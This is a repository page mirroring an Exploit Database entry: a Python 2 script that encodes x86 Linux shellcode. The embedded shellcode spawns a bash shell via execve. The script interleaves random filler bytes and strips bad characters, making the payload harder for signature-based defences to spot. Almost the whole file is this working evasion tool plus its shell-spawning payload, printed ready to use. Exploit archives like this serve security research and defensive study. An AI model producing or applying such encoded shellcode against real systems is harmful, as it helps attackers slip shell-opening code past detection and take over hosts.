bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/shellcodes/linux_x86/46323.py
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

83 lines
No EOL
1.9 KiB
Python
Executable file
Raw Blame History

#!/usr/bin/python
# Python Random Insertion Encoder
# Author: Aditya Chaudhary
# Date: 5th Feb 2019
import random
import sys
import argparse
shellcode = ("\x31\xc0\x50\x89\xe2\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80")
# Parse Arguments
parser = argparse.ArgumentParser()
parser.add_argument("-e", "--entropy", help="Entropy of random byted to be inserted after each shellcode byte (use a value between 1 & 10)", type=int)
parser.add_argument("-b", "--badchars", help="Badchars to removed from inserted bytes", type=str)
args = parser.parse_args()
encoded = ""
encoded2 = ""
entropy = args.entropy
bad_chars = args.badchars
#print len(sys.argv)
#if len(sys.argv) > 1:
# entropy = int(sys.argv[1])
print '[#] Using Entropy: %s (inserting 1 to %s random number of bytes)'%(entropy, entropy)
#if len(sys.argv) < 3:
# print '[#] No Bad characters provided'
#else:
# bad_chars = str(sys.argv[2])
bad_chars = bad_chars.split(',')
print '[#] Bad chars: %s'%(bad_chars)
# Generate byte string from \x01 to \xff
chars = []
for o in range(256):
#print(hex(o))
ch = '%02x' % o
if ch not in bad_chars:
chars.append(ch)
print '[#] Generating Shellcode...'
repeat = 0
for x in bytearray(shellcode) :
repeat = random.randint(1, entropy)
#print "[#]"+str(repeat)
encoded += '\\x'
encoded += '%02x' % x
encoded += '\\x'
encoded += '%02x'% repeat
encoded2 += '0x'
encoded2 += '%02x,' % x
encoded2 += '0x'
encoded2 += '%02x,' % repeat
en_byte = ""
for i in range(1, repeat+1):
# print i
en_byte = chars[random.randint(0, len(chars)-1)]
encoded += '\\x%s' % en_byte
# encoded += '\\x%02x' % random.randint(1,255)
encoded2 += '0x%s,' % en_byte
# encoded2 += '0x%02x,' % random.randint(1,255)
#encoded += '\n'
print '[#] Encoded shellcode:'
print encoded
print encoded2
print '[#] Shellcode Length: %d' % len(bytearray(shellcode))
print '[#] Encoded Shellcode Length: %d' % encoded.count('x')
Reference in a new issue View git blame Copy permalink